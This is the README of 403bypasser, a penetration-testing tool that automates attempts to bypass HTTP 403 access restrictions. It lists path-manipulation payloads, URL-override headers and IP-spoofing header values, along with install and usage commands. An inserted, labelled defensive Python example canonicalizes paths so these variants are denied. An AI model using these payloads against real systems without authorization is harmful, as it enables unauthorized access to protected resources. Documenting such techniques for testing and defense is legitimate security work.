403bypasser: circumvent access control restrictions on target pages
403bypasser
403bypasser automates the techniques used to circumvent access control restrictions on target pages. 403bypasser will continue to be improved and it is open to contributions.
Which Cases Does This Tool Check?
1. Request Method Manipulation
Convert GET request to POST request
2. Path Manipulation
/%2e/secret
/secret/
/secret..;/
/secret/..;/
/secret%20
/secret%09
/secret%00
/secret.json
/secret.css
/secret.html
/secret?
/secret??
/secret???
/secret?testparam
/secret#
/secret#test
/secret/.
//secret//
/./secret/./
3. Overriding the Target URL via Non-Standard Headers
X-Original-URL: /secret
X-Rewrite-URL: /secret
4. Other Headers & Values
Headers:
X-Custom-IP-Authorization
X-Forwarded-For
X-Forward-For
X-Remote-IP
X-Originating-IP
X-Remote-Addr
X-Client-IP
X-Real-IP
Values:
localhost
localhost:80
localhost:443
127.0.0.1
127.0.0.1:80
127.0.0.1:443
2130706433
0x7F000001
0177.0000.0000.0001
0
127.1
10.0.0.0
10.0.0.1
172.16.0.0
172.16.0.1
192.168.1.0
192.168.1.1
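A defender-side counterpart to the path variants in case 2, as an added example that is not part of 403bypasser or its README: canonicalize the raw request target once, then apply the access rule to the canonical form, so that every listed variant is either denied like /secret or refused as ambiguous. The names PROTECTED, canonical_path and decide are hypothetical, and the extension-stripping step assumes a backend that routes /secret.json to the /secret handler.

```python
import posixpath
from urllib.parse import unquote

# Assumption: "/secret" is the protected prefix, as in the page's examples.
PROTECTED = ("/secret",)

# Constructed sample input: the path variants listed under case 2 above.
VARIANTS = [
    "/%2e/secret", "/secret/", "/secret..;/", "/secret/..;/", "/secret%20",
    "/secret%09", "/secret%00", "/secret.json", "/secret.css", "/secret.html",
    "/secret?", "/secret??", "/secret???", "/secret?testparam", "/secret#",
    "/secret#test", "/secret/.", "//secret//", "/./secret/./",
]

def canonical_path(target):
    """Canonical path for a raw request target, or None if it is ambiguous."""
    path = target.split("?", 1)[0].split("#", 1)[0]   # drop query and fragment
    for _ in range(3):                                # undo nested percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Whitespace and control bytes (%20, %09, %00), ';' path parameters and any
    # '%' still left after decoding are parsed differently by proxies and
    # backends, so refuse them outright instead of guessing.
    if any(ord(c) <= 0x20 or c in ";%\x7f" for c in path):
        return None
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):                          # "//" and "/./" collapse
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def decide(target):
    """Return 'reject', 'deny' or 'allow' for a raw request target."""
    path = canonical_path(target)
    if path is None:
        return "reject"
    # Also test the path without its final extension (see assumption above).
    for candidate in (path, posixpath.splitext(path)[0]):
        if any(candidate == p or candidate.startswith(p + "/") for p in PROTECTED):
            return "deny"
    return "allow"

if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v:22} -> {decide(v)}")
```

The same canonical form has to be what the backend routes on; if the proxy checks one string and forwards another, the mismatch these variants probe for is still there.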
Install
git clone https://github.com/yunemse48/403bypasser.git
cd 403bypasser
pip install -r requirements.txt
Use
Usage 1: python3 403bypasser.py -u https://example.com -d /secret
Usage 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Usage 3: python3 403bypasser.py -U urllist.txt -d /secret
Usage 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
IMPORTANT NOTE: All the following are interpreted the same. Therefore, which pattern you use is just a matter of preference.
python3 403bypasser.py -u https://example.com -d secret
python3 403bypasser.py -u https://example.com -d /secret
python3 403bypasser.py -u https://example.com -d /secret/
python3 403bypasser.py -u https://example.com -d secret/
python3 403bypasser.py -u https://example.com/ -d secret
ALL THE SAME!
Since Python is a cross-platform language, one can run this program on different operating systems.
Output
The output of the program is saved in the current directory, in a file named after the domain given as input.
For example, if the command
python3 403bypasser.py -u https://example.com -d /secret
is run, the output is saved to example.txt in the current directory.
Copyright (c) 2021 Yunus Emre SERT
Source: https://github.com/yunemse48/